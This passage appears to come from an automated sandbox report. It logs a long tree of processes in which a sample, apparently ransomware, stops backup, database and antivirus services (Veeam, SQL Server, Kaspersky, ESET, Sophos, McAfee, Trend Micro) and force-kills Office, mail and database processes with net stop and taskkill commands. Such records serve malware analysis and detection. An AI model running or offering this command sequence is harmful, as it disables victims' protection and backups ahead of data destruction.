      C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
      4⤵
      PID:6424
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SNAC /y
  2⤵
  PID:9268
- - C:\Windows\SysWOW64\net.exe
    net stop SNAC /y
    3⤵
    PID:7408
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SNAC /y
      4⤵
      PID:5828
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:9436
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:4736
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:9596
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:5180
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:9620
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:5488
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:9716
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:7900
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$SQL_2008 /y
  2⤵
  PID:9872
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SQL_2008 /y
    3⤵
    PID:6800
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:9912
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:1640
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:7016
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLSafeOLRService /y
  2⤵
  PID:10136
- - C:\Windows\SysWOW64\net.exe
    net stop SQLSafeOLRService /y
    3⤵
    PID:3028
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLSafeOLRService /y
      4⤵
      PID:8968
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLSERVERAGENT /y
  2⤵
  PID:10196
- - C:\Windows\SysWOW64\net.exe
    net stop SQLSERVERAGENT /y
    3⤵
    PID:5124
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT /y
      4⤵
      PID:10012
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:2928
- - C:\Windows\SysWOW64\net.exe
    net stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:5128
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLTELEMETRY /y
  2⤵
  PID:10224
- - C:\Windows\SysWOW64\net.exe
    net stop SQLTELEMETRY /y
    3⤵
    PID:5860
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLWriter /y
  2⤵
  PID:3492
- - C:\Windows\SysWOW64\net.exe
    net stop SQLWriter /y
    3⤵
    PID:7108
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLWriter /y
      4⤵
      PID:8308
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SstpSvc /y
  2⤵
  PID:7612
- - C:\Windows\SysWOW64\net.exe
    net stop SstpSvc /y
    3⤵
    PID:5284
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop svcGenericHost /y
  2⤵
  PID:7452
- - C:\Windows\SysWOW64\net.exe
    net stop svcGenericHost /y
    3⤵
    PID:7976
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:7424
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop swi_filter /y
  2⤵
  PID:7492
- - C:\Windows\SysWOW64\net.exe
    net stop swi_filter /y
    3⤵
    PID:8652
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8932
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop swi_service /y
  2⤵
  PID:3724
- - C:\Windows\SysWOW64\net.exe
    net stop swi_service /y
    3⤵
    PID:6816
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop VeeamBackupSvc /y
  2⤵
  PID:7604
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6452
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamBackupSvc /y
    3⤵
    PID:5724
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamBackupSvc /y
      4⤵
      PID:7144
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop UI0Detect /y
  2⤵
  PID:8884
- - C:\Windows\SysWOW64\net.exe
    net stop UI0Detect /y
    3⤵
    PID:9372
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop TrueKeyServiceHelper /y
  2⤵
  PID:6152
- - C:\Windows\SysWOW64\net.exe
    net stop TrueKeyServiceHelper /y
    3⤵
    PID:7424
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop VeeamBrokerSvc /y
  2⤵
  PID:7416
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamBrokerSvc /y
    3⤵
    PID:8072
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamBrokerSvc /y
      4⤵
      PID:2200
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop VeeamCatalogSvc /y
  2⤵
  PID:6612
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamCatalogSvc /y
    3⤵
    PID:8492
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamCatalogSvc /y
      4⤵
      PID:8876
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop POP3Svc /y
      4⤵
      PID:6816
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop VeeamDeploymentService /y
  2⤵
  PID:7688
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamDeploymentService /y
    3⤵
    PID:7728
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:6508
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop VeeamCloudSvc /y
  2⤵
  PID:6460
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6416
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamCloudSvc /y
    3⤵
    PID:6384
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamCloudSvc /y
      4⤵
      PID:6964
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:7076
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:10160
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop VeeamMountSvc /y
  2⤵
  PID:6972
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6236
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamMountSvc /y
    3⤵
    PID:9380
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamMountSvc /y
      4⤵
      PID:8044
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop VeeamDeploySvc /y
  2⤵
  PID:9072
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamDeploySvc /y
    3⤵
    PID:9164
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploySvc /y
      4⤵
      PID:6780
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop wbengine /y
  2⤵
  PID:7596
- - C:\Windows\SysWOW64\net.exe
    net stop wbengine /y
    3⤵
    PID:480
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:5600
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop W3Svc /y
  2⤵
  PID:5204
- - C:\Windows\SysWOW64\net.exe
    net stop W3Svc /y
    3⤵
    PID:4028
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:6524
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop VeeamTransportSvc /y
  2⤵
  PID:3648
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamTransportSvc /y
    3⤵
    PID:9844
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:7040
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop VeeamRESTSvc /y
  2⤵
  PID:8488
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamRESTSvc /y
    3⤵
    PID:9828
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:7140
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop VeeamNFSSvc /y
  2⤵
  PID:6788
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamNFSSvc /y
    3⤵
    PID:4720
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:10004
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop TrueKeyScheduler /y
  2⤵
  PID:8628
- - C:\Windows\SysWOW64\net.exe
    net stop TrueKeyScheduler /y
    3⤵
    PID:6824
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop TrueKeyScheduler /y
      4⤵
      PID:7760
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop TrueKey /y
  2⤵
  PID:8360
- - C:\Windows\SysWOW64\net.exe
    net stop TrueKey /y
    3⤵
    PID:6240
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop swi_update /y
  2⤵
  PID:7404
- - C:\Windows\SysWOW64\net.exe
    net stop swi_update /y
    3⤵
    PID:9484
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop swi_update /y
      4⤵
      PID:9444
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop VeeamHvIntegrationSvc /y
  2⤵
  PID:4048
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamHvIntegrationSvc /y
    3⤵
    PID:9252
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
      4⤵
      PID:9464
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:6056
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:2980
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:384
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:6276
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:5692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:10076
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop WRSVC /y
  2⤵
  PID:5620
- - C:\Windows\SysWOW64\net.exe
    net stop WRSVC /y
    3⤵
    PID:10032
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop tmlisten /y
  2⤵
  PID:8396
- - C:\Windows\SysWOW64\net.exe
    net stop tmlisten /y
    3⤵
    PID:6164
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop TmCCSF /y
  2⤵
  PID:7600
- - C:\Windows\SysWOW64\net.exe
    net stop TmCCSF /y
    3⤵
    PID:7112
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$CXDB /y
  2⤵
  PID:7308
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$CXDB /y
    3⤵
    PID:8440
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CXDB /y
      4⤵
      PID:8812
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$PROD /y
  2⤵
  PID:7124
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$PROD /y
    3⤵
    PID:5168
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:8840
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQL Backups /y
  2⤵
  PID:5164
- - C:\Windows\SysWOW64\net.exe
    net stop SQL Backups /y
    3⤵
    PID:4568
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQL Backups /y
      4⤵
      PID:6820
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Zoolz 2 Service /y
  2⤵
  PID:6636
- - C:\Windows\SysWOW64\net.exe
    net stop Zoolz 2 Service /y
    3⤵
    PID:1340
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Zoolz 2 Service /y
      4⤵
      PID:4280
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:8604
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:7256
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop msftesql$PROD /y
  2⤵
  PID:5612
- - C:\Windows\SysWOW64\net.exe
    net stop msftesql$PROD /y
    3⤵
    PID:10164
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:7108
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$SOPHOS /y
  2⤵
  PID:6156
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SOPHOS /y
    3⤵
    PID:5136
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
      4⤵
      PID:7360
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop ESHASRV /y
  2⤵
  PID:7712
- - C:\Windows\SysWOW64\net.exe
    net stop ESHASRV /y
    3⤵
    PID:8400
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ESHASRV /y
      4⤵
      PID:9864
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop ekrn /y
  2⤵
  PID:5868
- - C:\Windows\SysWOW64\net.exe
    net stop ekrn /y
    3⤵
    PID:7292
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ekrn /y
      4⤵
      PID:5496
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop AVP /y
  2⤵
  PID:780
- - C:\Windows\SysWOW64\net.exe
    net stop AVP /y
    3⤵
    PID:8872
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop wbengine /y
  2⤵
  PID:3452
- - C:\Windows\SysWOW64\net.exe
    net stop wbengine /y
    3⤵
    PID:7264
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:8456
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:6060
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:4700
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:9108
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:6076
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:9644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:6764
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop klnagent /y
  2⤵
  PID:6136
- - C:\Windows\SysWOW64\net.exe
    net stop klnagent /y
    3⤵
    PID:7736
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop klnagent /y
      4⤵
      PID:9548
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM dbsnmp.exe /F
  2⤵
  PID:5520
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:10184
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM encsvc.exe /F
  2⤵
  PID:1284
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7024
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM dbeng50.exe /F
  2⤵
  PID:6396
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9724
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM agntsvc.exe /F
  2⤵
  PID:5228
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9972
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM zoolz.exe /F
  2⤵
  PID:10072
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9652
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM infopath.exe /F
  2⤵
  PID:8064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9840
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM firefoxconfig.exe /F
  2⤵
  PID:6624
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM firefoxconfig.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6096
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM excel.exe /F
  2⤵
  PID:10192
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:10132
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop mfefire /y
  2⤵
  PID:9192
- - C:\Windows\SysWOW64\net.exe
    net stop mfefire /y
    3⤵
    PID:9984
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM isqlplussvc.exe /F
  2⤵
  PID:8696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9960
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM msftesql.exe /F
  2⤵
  PID:6680
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9900
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM mydesktopqos.exe /F
  2⤵
  PID:6852
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:10232
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM mspub.exe /F
  2⤵
  PID:9756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9916
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM msaccess.exe /F
  2⤵
  PID:7692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:10124
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM mysqld-nt.exe /F
  2⤵
  PID:8520
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:10188
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM mysqld.exe /F
  2⤵
  PID:4484
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7504
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM mydesktopservice.exe /F
  2⤵
  PID:6020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9908
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop KAVFS /y
  2⤵
  PID:8596
- - C:\Windows\SysWOW64\net.exe
    net stop KAVFS /y
    3⤵
    PID:9288
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop KAVFS /y
      4⤵
      PID:9800
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM mysqld-opt.exe /F
  2⤵
  PID:6552
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9884
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM ocautoupds.exe /F
  2⤵
  PID:7388
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM ocautoupds.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:10036
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM ocssd.exe /F
  2⤵
  PID:5044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:10204
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM ocomm.exe /F
  2⤵
  PID:5736
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:8748
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM onenote.exe /F
  2⤵
  PID:6732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:8244
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM powerpnt.exe /F
  2⤵
  PID:176
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM powerpnt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:10236
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM outlook.exe /F
  2⤵
  PID:3872
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:10128
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM oracle.exe /F
  2⤵
  PID:4396
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6040
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop KAVFSGT /y
  2⤵
  PID:8032
- - C:\Windows\SysWOW64\net.exe
    net stop KAVFSGT /y
    3⤵
    PID:9452
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop KAVFSGT /y
      4⤵
      PID:2616
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM steam.exe /F
  2⤵
  PID:3732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:8836
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM sqlwriter.exe /F
  2⤵
  PID:5340
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:8296
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM tbirdconfig.exe /F
  2⤵
  PID:8292
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:8568
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM synctime.exe /F
  2⤵
  PID:7992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4580
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM thebat.exe /F
  2⤵
  PID:9576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6812
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM sqlservr.exe /F
  2⤵
  PID:360
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6348
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM sqlbrowser.exe /F
  2⤵
  PID:8552
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7004
- C:\Windows\SysWOW64\cmd.exe
